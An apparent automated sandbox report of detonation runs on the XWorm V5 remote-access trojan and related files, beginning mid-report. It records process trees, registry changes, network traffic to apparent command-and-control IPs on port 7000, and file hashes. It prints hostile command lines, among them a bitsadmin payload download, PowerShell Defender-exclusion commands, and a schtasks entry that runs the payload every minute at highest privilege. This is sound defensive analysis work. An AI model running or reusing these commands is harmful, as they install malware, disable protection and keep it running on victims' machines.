PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

C:\Users\Admin\AppData\Roaming\Output.exe

"C:\Users\Admin\AppData\Roaming\Output.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {328C09D4-728B-4380-B0EA-3FA004774498} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/2572-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmp

memory/2572-1-0x0000000001170000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA1 378d5339f1b675e98c81f4446f9e9ad81bc9da9f
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad
SHA512 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6

memory/1800-7-0x0000000000130000-0x000000000013C000-memory.dmp

memory/1800-11-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA1 439ce7924db3f534a14d78470c57c98e397969ee
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4
SHA512 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

memory/2812-12-0x0000000000160000-0x0000000000170000-memory.dmp

memory/2300-17-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2300-18-0x0000000002080000-0x0000000002088000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d6288b5bc31fa80d87f5a2741f702a7e
SHA1 dde30199e258f61238a463d083cb33bad653f747
SHA256 530ae6615edb670572d84c86e1c294e174e920ebb3e5b4112051b889413f003b
SHA512 257ac3a3a996e2803e4aaa1609d50f2d5d1e21071082534258972ae0d26c927e57e579444fc525df6477b4f83039b989553900255060ea5636840e8bea6161cf

memory/1564-24-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/1564-25-0x0000000001E70000-0x0000000001E78000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA1 6a9a84e0a11010262ea35790fcdf824193805c76
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405
SHA512 b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006

memory/1616-45-0x0000000001160000-0x0000000001170000-memory.dmp

memory/2840-51-0x00000000013B0000-0x00000000013C0000-memory.dmp

memory/2068-55-0x00000000002E0000-0x00000000002F0000-memory.dmp

memory/2236-57-0x0000000000020000-0x0000000000030000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win7-20240704-en

Max time kernel

360s

Max time network

370s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win7-20240705-en

Max time kernel

361s

Max time network

364s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win7-20240704-en

Max time kernel

309s

Max time network

319s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win10v2004-20240802-en

Max time kernel

432s

Max time network

434s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:32

Platform

win7-20240708-en

Max time kernel

357s

Max time network

360s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

428s

Max time network

430s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

441s

Max time network

443s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win7-20240729-en

Max time kernel

314s

Max time network

316s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win7-20240704-en

Max time kernel

307s

Max time network

316s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win7-20240729-en

Max time kernel

314s

Max time network

317s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:40

Platform

win7-20240704-en

Max time kernel

361s

Max time network

364s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:41

Platform

win10v2004-20240802-en

Max time kernel

421s

Max time network

424s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win7-20240708-en

Max time kernel

359s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:37

Platform

win7-20240729-en

Max time kernel

580s

Max time network

592s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe
PID 1936 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Windows\system32\taskeng.exe

taskeng.exe {E4D399A1-1056-4EA6-BB64-DA63AD9DC360} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp

Files

memory/1936-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/1936-1-0x00000000003A0000-0x00000000003D4000-memory.dmp

memory/1936-2-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

memory/2684-7-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2684-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f4c6c1b7c71397124c059b6996310a35
SHA1 8a837e53686e77a07859d60a98fab24c36079d3a
SHA256 6b4d966e98ea6966e454af2c83cdd758c625ae625e7ae038349e534b13a82e49
SHA512 fba0a7230e7e6265e8bd4210896211f0d86bdd3d811f502aa3c9b50a6dd60c1e9d0b6b4213ab956b354569079ada143d1fb7138b720eaa85bcb0d0cf2ab9bdfc

memory/2472-14-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2472-15-0x0000000002670000-0x0000000002678000-memory.dmp

memory/1936-29-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/1936-30-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win10v2004-20240802-en

Max time kernel

597s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
